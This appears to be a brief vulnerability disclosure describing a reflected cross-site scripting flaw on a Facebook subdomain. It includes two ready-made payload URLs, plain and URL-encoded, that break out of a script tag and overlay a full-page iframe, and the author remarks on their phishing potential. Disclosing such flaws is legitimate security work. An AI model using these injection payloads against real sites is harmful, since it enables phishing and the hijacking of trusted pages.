Facebook Cross Site Scripting

`Found in August, I tried to alert facebook as quickly as was possible  
- however I received no further correspondence to my communications.  
At time of writing, it was possible to exploit both Firefox 3 and IE 7  
- by simply using an IFRAME or even an object tag. (Dependant on the  
browser target)  
  
This allows you to overwrite the whole page with your choice of script/embed.  
  
Vulnerability was found by accident when I was routing my web traffic  
via WebScarab with an advanced list of strings to use with the  
in-built XSS/CSRF tool.  
  
----------------  
  
http://2.channel15.facebook.com/iframe/7/?pv=49&rev="></script><title>Google</title></head></body><IFRAME  
src="http://www.google.com/" type="text/html" width="100%"  
height="100%"></IFRAME>  
  
Naturally that rather obvious URL could be encoded, or cut down to  
prevent the obvious anomaly. However, I feel the facebook domain name  
itself would be enough to fool most users.  
  
http://2.channel15.facebook.com/iframe/7/?pv=49&rev=%22%3E%3C/script%3E%3Ctitle%3EGoogle%3C/title%3E%3C/head%3E%3C/body%3E%3CIFRAME%20src%3D%22http%3A//www.google.com/%22%20type%3D%22text/html%22%20width%3D%22100%25%22%20height%3D%22100%25%22%3E%3C/IFRAME%3E  
  
----------------  
  
*Similar vulnerabilities had been spoken about on a credit card fraud  
(carding) forum prior to my discovery of this. Possibly for the use of  
phisihing.*  
  
`